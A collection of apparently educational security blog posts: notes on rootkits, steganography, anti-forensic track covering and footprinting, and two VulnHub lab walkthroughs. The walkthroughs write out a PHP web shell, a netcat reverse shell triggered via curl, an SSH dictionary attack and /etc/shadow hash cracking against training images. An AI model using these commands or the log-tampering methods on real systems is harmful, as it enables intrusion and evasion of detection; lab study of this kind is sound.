  • Do not ignore updates: Updates computer’s applications and operating system can be annoying, especially when it seems as if there is a new update to approve every time it turns on. But they should not be ignored. Keeping operating systems, antivirus software, and other applications updated is the best way to protect from rootkits.
  • Watch out for phishing emails: Phishing emails are sent by scammers who want to trick users into providing them with financial information or downloading malicious software, such as rootkits, onto computers.
  • Be careful of drive-by downloads: Drive-by downloads can be especially troublesome. These happen when users visit a website and it automatically installs malware on their computer. They do not have to click on anything or download anything from the site for this to happen. And it is not just suspicious websites that can cause this. Hackers can embed malicious code in legitimate sites to cause these automatic downloads.
  • Do not download files sent by unknown people: Users need to be careful, too, when opening attachments. They should not open attachments sent by unknown people. Doing so could cause a rootkit to be installed on their computer.

Steganography

Steganography is the practice of sending data in a concealed format so the very fact of sending the data is disguised. The word steganography is a combination of the Greek words στεγανός (steganos), meaning “covered, concealed, or protected”, and γράφειν (graphein) meaning “writing”.

Unlike cryptography, which conceals the contents of a secret message, steganography conceals the very fact that a message is communicated. The concept of steganography was first introduced in 1499, but the idea itself has existed since ancient times. There are stories of a method being used in the Roman Empire whereby a slave chosen to convey a secret message had his scalp shaved clean and a message was tattooed onto the skin. When the messenger’s hair grew back, he was dispatched on his mission. The receiver shaved the messenger’s scalp again and read the message.

Classifications

Steganography is classified into two types, Technical and Linguistic. Technical includes concealing information using methods like invisible ink, microdots, and other methods to hide information. Linguistic uses the text as covering media to hide the information like cyphers and codes.

Types

As steganography types we can find:

  • Text steganography: The techniques in text steganography are the number of tabs, white spaces, capital letters, just like Morse code is used to achieve information hiding.
  • Image Steganography: Taking the cover object as an image in steganography is called image steganography. In this technique pixel intensities are used to hide the information. The 8 bit and 24-bit images are common. The image size is large then hides more information. Larger images may require compression to avoid detection and the Techniques are LSB insertion and Masking and filtering.
  • Network Steganography: Taking cover objects as network protocol i.e. TCP, UDP, IP etc, where the protocol used as a carrier is called network protocol steganography. In the OSI model there exist the channels where steganography can be achieved in unused header bits of TCP/IP fields.
  • Audio Steganography: Taking audio as a carrier for information hiding is called audio steganography. It is a very important medium due to voice over IP (VOIP) popularity. It is used for digital audio formats such as WAVE, MIDI, and AVI MPEG for steganography. The methods are LSB coding, echo hiding, parity coding, etc.
  • Video Steganography: It is a technique to hide any type of files or information into digital video format. Video i.e. the combination of pictures is used as a carrier for hidden information. The discrete cosine transforms i.e. DCT change the values e.g., 8.667 to 9 which is used to hide the information in each of the images in the video, which is not justified by the human eye. It is used such as H.264, Mp4, MPEG, AVI or other video formats.

Stegoanalysis

Steganalysis is the discovery of the existence of hidden information; therefore, like cryptography and cryptanalysis, the goal of steganalysis is to discover hidden information and to break the security of its carriers. Steganalysis is the practice of attacking steganography methods for the detection, extraction, destruction and manipulation of the hidden data in a stego object.

Attacks can be of several types, for example, some attacks merely detect the presence of hidden data, some try to detect and extract the hidden data, some just try to destroy the hidden data by finding the existence without trying to extract hidden data and some try to replace hidden data with other data by finding the exact location where the data is hidden.

Detection is enough to foil the very purpose of steganography even if the secret message is not extracted because detecting the existence of hidden data is enough if it needs to be destroyed. Detection is generally carried out by identifying some characteristic feature of images that is altered by the hidden data. A good steganalyst must be aware of the methods and techniques of the steganography tools to efficiently attack.

Classification of attacks based on information available to the attacker:

  • Stego only attack: Only stego object is available for analysis.
  • Known cover attack: Both cover and stego are known.
  • Known message attack: In some cases, the message is known and analyzing the stego object pattern for this embedded message may help to attack similar systems.
  • Chosen stego attack: Steganographic algorithm and stego object are known.
  • Chosen message attack: Here steganalyst creates some sample stego objects from many steganographic tools for a chosen message and analyses these stego objects with the suspected one and tries to find the algorithm used.
  • Known stego attack: Cover object and the steganographic tool used are known.

Steganalysis approaches

  • Visual attacks: By analyzing the images visually, like considering the bit images and try to find the difference visually in these single bit images.
  • Structural attacks: The format of data file often changes as the data to be hidden is embedded, identifying these characteristic structural changes can detect the existence of image, for example in palette-based steganography the palette of an image is changed before embedding data to reduce the number of colours so that the adjacent pixel colour difference should be very less. This shows that groups of pixels in a palette have the same colour which is not the case in normal images.
  • Statistical attacks: In these type of attacks the statistical analyses of the images by some mathematical formulas is done and the detection of hidden data is done based on these statistical results. Generally, the hidden message is more random than the original data of the image thus finding the formulae to know the randomness reveals the existence of data.

Covering tracks

Covering Tracks is the final stage of a penetration test as a process – all the rest is paperwork. In a nutshell, its goal is to erase the digital signs left out by the pentester during the earlier stages of the test. These digital signs, in essence, prove the pentester’s presence in the targeted computer system. The same applies to an attacker, well, probably without the paperwork.

The purpose of this phase is to cover up all the little clues that would give away the nature of attackers’ deeds. Covering Tracks consists of:

  1. Measures for the prevention of real-time detection (Anti-Incident Response).
  2. Measures for the prevention of digital evidence collection during a possible post factum inquiry (Anti-Forensics).

Most common techniques that are often used by attackers to cover tracks on a target system are:

  • Disabling auditing
  • Moving, hiding, altering or renaming log files
  • Deleting evidence
  • Log tampering

Disabling Auditing

Operative systems have active auditing tools detecting, monitoring and tracking events. One of the best methods attackers can use is not leaving any trace they have been there. If once they have access to a system, they disable the auditing system, their activity will not be registered. Even better, if they enable the auditing system when they leave.

Moving, Hiding, Altering or Renaming Files

Things, like moving given files, changing extensions, renaming, split files into small partitions and conceal each partition at the end of other files or hide one file inside another, seem naive but very effective, especially, when we consider that sometimes people involved in a cyber investigation do not have the time to examine one by one all the files residing in a computer system.

And, timestamping, due to the lack of time of investigators, one approach which allows them to prioritize their search of information potentially relevant to the investigation is to arrange this information in chronological order so that they can focus on the important pieces of data occurred around the moment of the cybercrime if it is known but, attackers can tackle this approach by modifying the metadata about any files they want. In most cases, they change the date on which each file was created, last accessed, or last modified. This effective anti-forensic technique is named time stopping, and tools to detect its creations do exist.

Deleting Evidence

A common delusion among persons who count on commercial disk cleaners or privacy protection tools to delete some data they do not want others to see is the belief that these tools remove everything from the hard disc once and for all.

Despite the imperfectness of the delete method. A well-done erase will irreversibly dispose of evidence, leaving investigators empty-handed. Nevertheless, not so proficient users are prone to make mistakes, which may cost them a lot in cases of unsuccessful attempts to delete the data on the hard disk.

Unless we discuss SSD drives (which are programmed to destroy data automatically), hard drives and storage media are susceptible to almost full recovery via data carving. All in all, this method is very popular but not so effective.

Log Tampering

In Windows-based computer systems, all of the log files are stored in the event viewer, easily findable via the “Search” bar. In almost all Linux and UNIX operating systems the log files are located in the ‘/var/log‘ directory, and in MAC operating systems one should open the Finder, click “Go to Folder” in the Go menu and type in ‘/Library/Logs‘ and press Enter to activate the Log File Management which will display all log files.

If administrators want to check for malicious activities within the system for which they are responsible, they simply examine the log files. There are two kinds of log files: system generated and application generated.

When it comes to log manipulation, the attacker usually has two options. The first option is to delete the log, and the second one is to alter its content. Deletion of log files and replacement of system binaries with Trojan malware ensures that the security staff employed by the targeted company will not detect evidence of the cyber intrusion.

The first choice – to delete the log files – is not always the ultimate solution to undetectability, since the removal of such information might create a gap between logs files and raise suspicion. One look at the processes and log files would be enough for a system administrator at the target’s premises to establish the existence of any malicious activities.

CEH (VII): System Hacking

WALKTHROUGH: De-ICE: S1.100

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “De-ICE: S1.100”.

Information

https://www.vulnhub.com/entry/de-ice-s1100,8/

Scenario

The scenario for this LiveCD is that a CEO of a small company has been pressured by the Board of Directors to have a penetration test done within the company. The CEO, believing his company is secure, feels this is a huge waste of money, especially since he already has a company scan their network for vulnerabilities (using nessus). To make the BoD happy, he decides to hire you for a 5-day job; and because he really doesn’t believe the company is insecure, he has contracted you to look at only one server – a old system that only has a web-based list of the company’s contact information.

The CEO expects you to prove that the admins of the box follow all proper accepted security practices, and that you will not be able to obtain access to the box. Prove to him that a full penetration test of their entire corporation would be the best way to ensure his company is actually following best security practices.

Configuration

PenTest Lab Disk 1.100: This LiveCD is configured with an IP address of 192.168.1.100 – no additional configuration is necessary.

Download

ISO image

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the used for this article are or can be installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking if they are in the same network and we can see the training machine from testing machine. We can use the “ping” command, but in this case is going to fail, or the “netdiscover” command, just to list a couple of them. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.1.0/24
01-netdiscover
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the first step is to take a look around checking the web page there is available. We can see a brief explanation about the challenge and not much more than that. But, we can see a very important thing here. Reading carefully the page we can see there are some email related with the company.

Head of HR: Marie Mary - marym@herot.net (On Emergency Leave)
Employee Pay: Pat Patrick - patrickp@herot.net
Travel Comp: Terry Thompson - thompsont@herot.net
Benefits: Ben Benedict - benedictb@herot.net
Director of Engineering: Erin Gennieg - genniege@herot.net
Project Manager: Paul Michael - michaelp@herot.net
Engineer Lead: Ester Long - longe@herot.net
Sr.System Admin: Adam Adams - adamsa@herot.net
System Admin (Intern): Bob Banter - banterb@herot.net
System Admin: Chad Coffee - coffeec@herot.net

We should pay special attention to the last three because they are admin users.

This gives us a few information:

  • Names of people that is working in the company.
  • Valid emails.
  • Examples of how they are creating usernames.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.1.100
02-nmap
Figure 2. nmap results

As we can see, there are a few port open in the training machine:

  • 21: FTP service. And, something is not right here.
  • 22 SSH service
  • 25 SMTP service
  • 80 HTTP service
  • 110 POP3 service
  • 143 IMAP service

Considering we do not have any other information, we need to start thinking in what we are missing. We already have some valid email, with this information we can create a list of possible users in the system. In addition, we can add users like “root” or “admin” or similar users that are always useful to have. In this case, our list can be something like:

root
admin
aadams adamsa adamsad adam.adams
bbanter banterb banterbo bob.banter
ccoffee coffeec coffeech chad.coffee

Now, that we have a list of possible users, we can try to connect to the SSH service. For this, we are going to use the tool “medusa” trying to do a dictionary attack to see if we are lucky.

medusa -h 192.168.1.100 -U users.txt -P passwds.txt -M ssh -v 4 -w 0
03-medusa
Figure 3. medusa result

As we can see, we have been able to break one password. Let’s use it and try to connect using SSH.

ssh aadams@192.168.1.100
04-ssh
Figure 4. SSH connection with aadams

As we can see, we are able to connect. Now that we are inside, let’s see what “sudo” commands we have available.

sudo -l
05-sudo
Figure 5: Available tools

We can see we can use the tool “cat” to read file content. Then, let’s check the files “/etc/passwd” and “/etc/shadow”.

06-cat_shadow
Figure 6: /etc/shadow content

With a simple copy and paste we can move the content of both files to our machine to try to use “John” to discover new passwords, specially the “root” password. After the copies are done, we can “unshadow” the files to have everything in one file.

unshadow pasad_file.txt shadow_file.txt > root_password.txt
07-unshadow
Figure 7. unshadowing the passwd and shadow files

Trying to save a little bit of time, and because we already have an operative user “aadams” we can copy the “root” credential to a file and try to break just the “root” password.

john just_root.txt
08-john
Figure 8. John results

Great! We have the “root” password. Now we can try to connect with SSH using the “root” credentials.

ssh root@192.168.1.100
09-no_root_ssh
Figure 9. SSH connection as “root” failing

As we can see, we are not able to connect as “root” user using SSH. But, we are still having the “root” password and a valid user “aadams”. Let’s try to login as “root” using our valid user

10-aadams_root
Figure 10: We are root!

Usually, now that we are root we can close the case and deliver our report, but going around a little bit we can find an interesting file, and considering this is a training exercise, we can play a bit more. The file is this one

11-found_file
Figure 11. Curious file
12-encripted_file
Figure 12. encripted file, maybe
bin walk salary_dec2003.csv.enc
15-binwalk
Figure 13. confirming is an excerpted file

What do we know about the file:

  • It is encrypted with OpenSSL.
  • It was in a folder only accessible by the “root” user. We can think that maybe it is going to be encrypted using the “root” password we have.
  • We know that we do not know the type of cipher.

We can check the type of ciphers that OpenSSL offers.

openssl enc help
18-ciphers
Figure 14. Available ciphers

Let’s try on of them out of curiosity to see how an error looks like, and after that, let’s try to figure out how to try/apply all of them to find the correct one.

openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary_dec2003.csv -k tarot
16-decripting_file
Figure 15. decripting file

I guess that it is because it is just a training environment but the one that does the job is the first one. No more attempts are needed. In the real world probably we should write a script to test all the cipher available.

17-files_content
Figure 16. File decrypted

With this our scenario finish. We have access to the machine, we have root permissions and we have decrypted the “salary” file, our job is done. It has been interesting but I thing that it is just possible because the passwords where not very strong.

WALKTHROUGH: De-ICE: S1.100

Walkthrough: 21LTR: Scene 1

The purpose of this article is to describe, for educational purposes (see disclaimer), the pentesting of a vulnerable image created for training purposes called “21LTR: Scene 1”.

Information

https://www.vulnhub.com/entry/21ltr-scene-1,3/

Scene 1

Your pentesting company has been hired to perform a test on a client company’s internal network. Your team has scanned the network and you have been assigned one of the discovered systems. Perform a test on this system starting from the beginning of your chosen methodology and submit your report to the project manager at scenes AT 21LTR DOT com

Scope Statement

The client has defined a set of limitations for the pentest: – All tests will be restricted to the systems identified on the 192.168.2.0/24 network. – All commands run against the network and systems must be supplied in the form of script files packaged with the submission of the report – A final report indicating all identified vulnerabilities and exploits will be provided to the company’s engineering department within 90 days of the start of this engagement.

Configuration

Scenario Pentest Lab Scene 1:

This LiveCD is configured with an IP address of 192.168.2.120 – no additional configuration is necessary.

Download

ISO image

Torrent file (Magnet)

I am going to skip the configuration process because it is trivial and it is not the purpose of this article.

All the used for this article are or can be installed in a Kali Linux distribution.

Once we have both machines running, our Kali Linux and the training image, the first step should be checking if they are in the same network and we can see the training machine from testing machine. We can use the “ping” command or the “netdiscover” command, just to list a couple of them. In my case, I have used “netdiscover”:

netdiscover -i eth1 -r 192.168.2.0/24
001-netdiscover
Figure 1. Netdiscover execution result

After we are sure we can reach the training machine, the first step is to take a look around checking the web page there is available. In this case the web page give us a few information and nothing interesting but, the source code os the page give us the first good information. As a comment in the page, we can find some credentials

login_pass_in_source_code
Figure 2. Credentials found in the source code

There is nothing else to do here but to be sure we are not missing some pages or folders let’s run a different tools against the web page to check it. The tool is going to be “dirb”

dirb http://192.168.2.120
005-dirb.png
Figure 3. dirb results

We can see that a couple of folders have been found, but the only one that seems to respond in the browser is the “/logs”. Unfortunately, returns a “Forbidden” error.

It is time to start exploring what the training system is offering. For this purpose, I am going to use “nmap”.

nmap -p 1-65535 -T4 -A -v 192.168.2.120
002-nmap.png
Figure 4. nmap results

As we can see, there are a few port open in the training machine:

  • 21: FTP service
  • 22: SSH service
  • 80: HTTP service
  • 10001: In this point, I am not sure what is this. In addition, it does not show always in the scanner results.

Considering we have some credential, lets try to connect to the different services. There is no luck with the SSH access but the FTP allows us to connect and try to explore. Unfortunately, we can just file one file.

003-ftp_connection.png
Figure 5. FTP exploration results

Considering we have found a folder “/logs” previously and we have found a file called “backup_log.php”, one good idea is to try the URL we can build with them.

http://192.168.2.120/logs/backup_log.php
004-browser
Figure 6. Page content

It looks like some kind of backup log system, but it is not giving us enough information to do anything else.

At this point, I must recognize that I was a bit lost and running out of ideas, then, in the meantime I went for a walk I left the “Wireshark” tools running. Why? Because both are good ideas, go for a walk when you are block and because you never know what you can find in the network. After taking a look to the traffic I saw some (a lot) calls asking for the IP address “192.168.2.240”.

006-wireshark
Figure 7. Wireshark results

At this point, I decided to change the IP of my testing machine to this address and turn on again the “Wireshark” to see what happen and, I have one interesting event. Apparently the training machine wants to establish a connection with “192.168.2.240” (my machine now) with the port 10000.

007-wireshark2
Figure 8. Wireshark results

Then, lets allow this connection to see what happen. To allow this, let’s execute “necat” and wait again.

nc -lvvp 10000 > output

Here wee can see the connection is done in some point and we have what it looks like a binary file called “output”. After a some investigation, we can see it is a “tar.gz” file (using exiftool) and we cannot find anything interesting in the file, but it is clear that it is a backup file.

008-wireshark3
Figure 9. Wireshark result
exiftool --list output
exif
Figure 10. exiftool result
014-downloaded file
Figure 11. Exploring backup file

Linking that in the “nmap” there is a port 10001 we do not know what it is, we have in the server a page that shows backup result messages and that we are obviously downloading a backup file, we can infer that maybe the port 10001 just open when its waiting for a response about the sent backup. To test this theory, let’s try to connect to the port 10001 when the backup is sent. Because we do not know when it is going to be send, let’s just try to connect multiple times.

while true; do nc -v 192.168.2.120 10001 && break; sleep 1; clear; done

After a few minutes, the connection is stablished and we can type a few instructions.

009-wireshark4
Figure 12. Wireshark results

Apparently, they are doing nothing but, when we go again to the backup log messages pages we can see what we have been typing.

010-browser
Figure 13. Messages typed

Then, let’s try to type something that allow us to do something useful and to have access to the training machine. Let’s try to inject a PHP on-line webcell:

<?php echo exec($_GET["cmd"]);?>

And type something to check if it is working.

curl --silent 192.168.2.120/logs/backup_log.php?cmd=id
011-curl to cmd.png
Figure 14. Connection result

As we can see (end of the image) we are connected as “apache” to the training machine. Now, let’s try to have a proper shell where to execute command and take a look properly to the system. We are going to a port in our system and try to connect with a shell process from the training machine.

nc -lvvp 443
curl --silent 192.168.2.120/logs/backup_log.php?cmd=/usr/bin/nc%20192.168.2.240%20443%20-e%20/bin/sh

And, success, we have our shell.

012-remote conexion
Figure 15. Shell in the training machine

The next step it is to try to find the credential files and see their content but, unfortunately, we can just list the file “/etc/passwd” and the credentials are (I guess) in “/etc/shadow” that I cannot list.

Our next step is going around the machine to see what we can find. In this case, after some exploration, we can find a folder “/media/USB_1/Stuff/Keys” with two very interesting files:

  • authorized_keys: With the key of the authorized users to connect with SSH. In this case “hbeale”
  • id_rsa: The private key to connect to SSH
015-user_for_ssh
Figure 16. User with SSH access
016-private_key
Figure 17. Private key

Coping the key to our system we can try to connect.

ssh hbeale@192.168.2.120
017-ssh_to_remote
Figure 18. SSH access

Checking what command we can execute as “sudo”. We can see we can use the tools “cat” to read file content.

sudo -l
018-available_no_pass
Figure 19. Available tools

Then, let’s check the file “/etc/shadow” again.

019-etc_shadow
Figure 20. /etc/shadow content

Here we can see the hash for the “root” user and copy it to a file in our system (root_password). Let’s try to increase our privileges cracking the hash with “John” (the tools John) and using one of the dictionaries that comes with Kali.

john --wordlist=rockyou.txt root_password
020-john_root
Figure 21. John’s execution

We are lucky, John has done its job properly and we have the password “formula1”. Let’s try it.

021-root
Figure 22. We are root!

With this our scenario finish. We have access to the machine and we have root permissions, our job is done. It has been funny and frustrating but I do not thing there would be the first one without the second one.

Walkthrough: 21LTR: Scene 1

Footprinting and Reconnaissance

What is Footprinting?

Footprinting is the first phase of a penetration test. It is the process of collecting as much information as possible about a target, for identifying possible vulnerable and entry points to make effective an attack.

Attackers gather information using public resources available on the Internet, on the real world, like dumpster diving, or through social engineering. The attackers try to find specific areas where they should focus their efforts, identify vulnerabilities in the systems to select the appropriate attack methodologies and/or exploits and draw a map of the organization’s network and, in general, they need to learn as much as they can about the target and find as much information as possible that can help them in the next phases of the attack.

There are some clear objectives during the footprinting like:

  • Collect network information: Domain names, internal domain names, network blocks, IP addresses of the reachable systems, rogue websites, private websites, TCP and UDP services running, access control mechanism and ACLs, network protocols, VPN points, IDSes running, analog and digital phone numbers, authentication mechanisms, system enumeration, …
  • Collect system information: User and group names, system banners, routing tables, SNMP information, system architecture, remote system type, system name, passwords, …
  • Collect organization’s information: Employee details, organization’s website, company directory, location details, address and phone numbers, comments in HTML source code, security policies implemented, web server links relevant to the organization, background of the organization, new articles, press releases, …

Obviously, each attacker has its own style and its own methodology, but a very basic one, can be:

  1. Footprinting through search engines.
  2. Footprinting using advanced search engine hacking techniques, like Google hacking.
  3. Footprinting through social network sites.
  4. Website footprinting.
  5. Email footprinting.
  6. Competitive intelligence.
  7. WHOIS footprinting.
  8. DNS footprinting.
  9. Network footprinting.
  10. Footprinting through social engineering.

Footprinting through search engines

Attackers use search engines to extract information about a target such as technology platforms, employee details, login pages, intranet portals, etc. which can help to perform social engineering attacks and other types of advanced system attacks. Search engines caches and internet archives can give as some useful information already removed from the websites.

And think big like attackers do. We have tools like Netcraft that can gives as a lot of information about the target system like subdomains or operative systems running. We have search engines like Shodan that allow us to find specific computers or devices connected to the Internet. You can find useful information using map apps like Google Maps, Bing Maps, … Social network sites like Facebook, Linkedin, Pipl, etc. There are tons of people directories and social networks where people give all their personal details and huge amounts of personal and private information without realizing about it. Financial services web pages, job sites, forums, blogs, groups, … plenty of places to gather information about a target.

Footprinting using advanced search engine hacking techniques

Nowadays, the different search engines provide us with complex syntax to allow us to refines our searches and, in the same way this can help users to perform more accurate   searches, it can allow attackers to find and extract sensitive or hidden information. Let’s take Google for example, as we can see in this page, it offers us multiple options to refine our searches and find resources that are not easily accessible. A easy way to use some of these operators, it is using the google advanced search page. This technique is very useful and very well know, we can even find pages with DB of multiple dorks to make our life even easier, like: GHDB.

Footprinting through social network sites

I have spoken about it in the first point but, I need to do it again, you can not image the huge amount of information an attacker can find through social networks. And we shouldn’t restrict our operations to searches, we can create fake profiles to lure the employees to give up their sensitive information. From users/employees point of view, an attacker can gather: contact info, location, friends lists, family lists, interests, activities, …. From a companies point of view, an attacker can gather: business strategies, product profiles, contact points for social engineering, platform/technology information, type of business, …. And more and more and more.

Website footprinting

Very interesting information can be gathered from the companies website. Software used and its version, operative system used, sub-directories and parameters, filenames, path, database field names or queries, scripting platform, contact details and CMS details. Using tools like HTTP proxies (Burp Suite, OWASP ZAP, …) we can view the request headers with info about the web page and systems running. Examining the source code we can find file system structure, contact details, script type, interesting undeleted comments, cookie’s information. And we do not need to do the search ourselves, there are some tools called web spiders that can perform the search for us. Or we can do this offline mirroring the entire website. In addition to the search engines caches, we can use archive.org to find information that was online and now has been removed. Documents with metadata information can be found here too.

Email footprinting

We can take two different paths here. The first one is to examine the email headers, in there we can find some useful information. The second path is to use email tracking tools to obtain useful information.

Competitive intelligence

Information about competitors can be very useful, especially for social engineering attacks. History of the company, company plans, experts opinions, website traffic, reputation, etc. any of this can be useful.

WHOIS footprinting

WHOIS is a database maintained by Regional Internet Registries and contain the personal information of domain owners.

DNS footprinting

Attackers can gather DNS information to determinate key hosts in the network and can perform social engineering attacks.

Footprinting through social engineering

Attackers can do things like eavesdropping, shoulder surfing, dumpster diving or impersonation on social networking sites to obtain interesting and useful information.

There are literally hundreds, probably thousands of tools useful for this phase of the attack. It will be impossible list all of them here, but I hope these lines are enough to stand out the importance of this phase.

See you.

Footprinting and Reconnaissance

Penetration testing phases

When we talk about penetration tests, a lot of people think that it is just a matter of starting our computers, run a few tools against the objective, do a bit of magic and, done, the pentester discovers a few vulnerabilities. But the truth is far from this point of view, maybe in the films is something like that but not in real life.

A pen-testing is a well-defined process, it has its methodologies like OSSTMM, OWASP and some others. All of them, define concrete steps and procedures that a pentester should follow to perform a proper task.

One of the things that it is well defined is the different phases of a pen-testing. We can find well-defined phases, each one of them specifying what needs to be done and when it needs to be done. The tools you use to complete each one of these phases are not important in this article, in this article, it is just important the process.

We can find five different phases in a pentest. Each one with its boundaries, objectives and goals well defined. These five phases are:

  • Reconnaissance
  • Scanning
  • Gaining access
  • Maintaining access
  • Clearing tracks

Let see a little introduction of the different phases.

Reconnaissance

Reconnaissance refers to the preparatory phase where an attacker seeks to gather information about a target prior to launching the attack. In other words, find all the information at our fingertips. The attackers are going to use all the public sources that they can reach to find information about the target. And we are not talking just about the company, we are talking about employees, business, operations, network, system, competitors, … everything we can learn about our target. We can use web pages, social networks, social engineering, … The objective is to know as much as we can about the victim and the elements around it.

We can find two types of reconnaissance:

  • Passive: Involves acquiring information without directly interact with the target.
  • Active: Involves interacting with the target directly by any means.

Scanning

Scanning refers to a pre-attack phase where the attacker scans the network for specific information on the basis of information gathered during the reconnaissance. In general, in this step, we are going to use port scanners, vulnerability scanners and similar tools to obtain information about the target environment like live machines, ports in each one of these machines, services running, OS details, … All this information will allow us to launch the attack.

Gaining access

Gaining access refers to the point where the attacker obtains access to a machine or application inside the target’s network. Part of this phase is when the attacker tries to escalate privileges to obtain complete control of the system or, based on the access the attacker has,  it tries to compromise other systems in the network. Here we have multiple tools and different possibilities like password cracking, denial of service, buffer overflows, session hijacking, …

Maintaining access

Maintaining access refers to the phase where the attacker tries to retain the ownership of the system and make future accesses to the compromised system easier, especially in the case that the way the attacker has used to compromise the system is fixed. The attacker can do multiple things like creating users in the system, install their own applications and hide them, install backdoors, rootkits or trojans even, in some cases, the attacker can secure the compromised machine to avoid other attackers to control the machine.

Clearing tracks

Clearing tracks refers to the activities carried out by an attacker to hide malicious acts. In this phase, the attacker tries to remove all the pieces of evidence about the machine being compromised trying to avoid, in the first place, the detection and, in second place, obstructing the prosecution.

These are the different phases of a pen-testing, and any service offered should perform all of them properly. In addition, one of the best things about performing all the phases correctly and in the adequate order is that we can use the information found in a previous phase to complete the next phase.

See you.

Penetration testing phases